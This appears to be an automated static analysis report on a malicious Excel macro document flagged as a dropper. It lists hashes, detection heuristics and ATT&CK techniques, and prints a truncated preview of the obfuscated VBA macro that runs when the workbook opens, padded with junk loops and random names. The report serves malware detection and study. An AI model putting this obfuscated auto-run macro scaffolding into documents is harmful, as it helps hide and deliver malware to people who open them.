Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 be9aaa5455ffb830…

MALICIOUS

Office (OOXML)

Size: 26.4 KB | Created: 2018-10-24 22:17:14 UTC | Authoring application: Microsoft Excel 12.0000 | First seen: 2019-03-18
MD5: f2bf5249e43cebdd5abf0a519ed0604f
SHA-1: 6352fa41e0a15c01ac48923e7719e35cb30b2b76
SHA-256: be9aaa5455ffb830a10bec777891a6bd7d05f5a05274c60f556d239170d5b494
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The file contains VBA macros, specifically a Workbook_Open macro that calls the Shell() function. This indicates the macro is designed to execute arbitrary commands as soon as the document is opened. The 'Doc.Dropper.Agent' ClamAV detection further supports its role as a dropper for additional malware. No specific URLs or network indicators were extracted, but the technique strongly suggests a payload download and execution.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-7144840-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-7144840-0
  • VBA project inside OOXML [medium, 4 related findings, OOXML_VBA]
    Document contains a VBA project (VBA macros present)
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Workbook_Open macro [high, OLE_VBA_WBOPEN]
    Workbook_Open macro
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source from OOXML) | Size: 13778 bytes
SHA-256: d7d6e76841b32a184d9eec52a899e6486339757ecd4f021ec6718a6bf231c69d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
TavdyF5uxeidRpM.U9ZuNu9chuFnnc9npjPr
While 6 = 1165
Dim eMlhswFNCfZKN7f2v1jsvySf_ZC8OkbKFCUGV2 As Variant
Wend
Dim BamtYBS5Xq6F1x_ As Integer
While 18 = 6057
Dim f5o3_cRtG8ZCNDJjXe4yH_BXPLHAUAHsmKjGoMQXrpeu8 As Variant
Wend
Dim zLEfj791Z3 As Integer
While 1 = 5948
Dim Pk1SPWExqXCbC4JMeEaiOZQGQxNchunSIMXkYDZQX7Pi As Variant
Wend
Dim BWHJUVa2Xz As Integer
While 21 = 2301
Dim myRsAbHkO5srRydixZnHIRHrE4nDGJSu5RjhQoB8HvpT As Variant
Wend
Dim yS_SouhALOoSpjm As Integer
While 11 = 7403
Dim FwDbDk8v9N5QGWp9Wkx2vyTWVkQgnmO2pA5J_Rkr1fE_sbYl As Variant
Wend
Dim fOQr1q1PapEaSY As Integer
While 7 = 8270
Dim GT8CjEae4D9_AOsOm3Kn_WTf_8InrXLIXZWtEp1RJAUMrv As Variant
Wend
Dim pkgKBKOnXs_ZBl As Integer

While 15 = 1092
Dim wvezyoi19H7A2c9BFwMQhEeVA3tAnsnnNV As Variant
Wend
Dim VNzV3EEthCD As Integer
While 21 = 4438
Dim IWIYq2lwSWqOHy65gKNcQueEtJt4FKx As Variant
Wend
Dim gbQzeik71Bz58o8 As Integer
While 3 = 1001
Dim qf7JggShuW1DoeGrpGiIwz9YT6NVaazfYvcL75mPL4eame6ZsRIvXeIzgfz As Variant
Wend
Dim kQ6ESgTm3B As Integer
While 5 = 2716
Dim utcR62Tfvy_xmGPCG3kmnY_B9PwJ3R1BXwgYQEi As Variant
Wend
Dim Pd_s_jbR7Cc As Integer
While 25 = 9831
Dim LsQWOTnaSn_Ilc87Yyj1tASSGmoDZe8 As Variant
Wend
Dim yGY_Ft_gKtz As Integer
While 10 = 3868
Dim v4KTWOBmCbVJrJY7OlnjAwpNALW1KXQWF4NXFv As Variant
Wend
Dim OYBvbdb7p4pv As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "TavdyF5uxeidRpM"
Dim zkXzNSvEWjS7eWbVkqd6_Gd81A3Bs5d3qrCQC2wfcNrBwpZb4nfn_X2qFY9LZtVb_ZNvTIRs48btXaJJjYFDXzxQzUJm2iEr2O7VZm As String
 Function s4fIy8L7SI1JZmJ8Dx5_zbUNgMTKvDecIYnV16_PJIb_g1UxSc228o(QAxZ_SojyMCLC5Ile8Zmz9n8EO7bNhE6pDHt1bE7iNEseVM_K2abxBFQVyTsVLUOGFe8uYuC1cDk34brB1OUFmGn61WBGViU2)
While 18 = 2510
Dim EWcrJEFXA_nl7MHamlO7R1ctPQNoiGin6Q_x2BtPc_j3 As Variant
Wend
Dim vpbsOJ5ZlN4sa3 As Integer
While 4 = 4158
Dim ax2d_pnHSij28bLPjtXegKz1Xreny4GjzYBPqW9 As Variant
Wend
Dim JFgGHoR77Y8S9B As Integer

 Dim Av8Znp3PzafwAXUasRo2LVXz3UIg4_J7qnZCAmiuJQszIUWSwWf8joLnVGfQeTUuOi_V7RY_r4p5lhpf8ysfgKVBZvo3FPOz58iiPAVd7ZOp8
While 7 = 7644
Dim WSN7_EPJ_RYZ9AhY5hKtLW9DpKEugN1iHgbEwSpQ As Variant
Wend
Dim q_FNrroQWfcX As Integer
While 4 = 8127
Dim FMx9SJOx9eltayPZhblk14CLPsT8exVAtab4sbulC2QJWUw2ZNs54 As Variant
Wend
Dim gLJkqiyQRJHj As Integer


   Dim qDoCoLXyVTe8WLJmUu4_QPdDAbQmuPbSeioBoiwLaMdjUPEyXeK9cedZikAL4uDE1KaxgG7u7qgCu3qsUbMODby_DNbDhjQpIXrIyPPOgY
While 2 = 7932
Dim VUq_p9h9k1y56bfP_ZF34NsFtJwuiEB As Variant
Wend
Dim vUvdDfmN4RgjSvv As Integer
While 20 = 4646
Dim mUuAEqcE_GliTdKvYdxBhH8asZKKiUmXT7gZ9g_SQNqVa7Rs As Variant
Wend
Dim reGEesLcWRQo As Integer
   
While 16 = 7903
Dim eQfscMMV7tw2dctRaj_vGabCMg3ktDBoNTx_r72Lr6u7rNjA93AwRd As Variant
Wend
Dim fDxce6Tlk3rFlIo As Integer
While 17 = 6688
Dim tjcrvDKoeS861lzBNVswtJNa62ES2NklYUNRfDfZTWRH As Variant
Wend
Dim f9b9uzbt3V4hU As Integer
 Set qDoCo
... (truncated)
Filename: vbaProject_00.bin | Kind: vba-project | Source: OOXML VBA project: xl/vbaProject.bin | Size: 41984 bytes
SHA-256: a8cf1ac5f85928aadd229b1084447b0996bdf9e987e3a92af2ca992437a14982
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).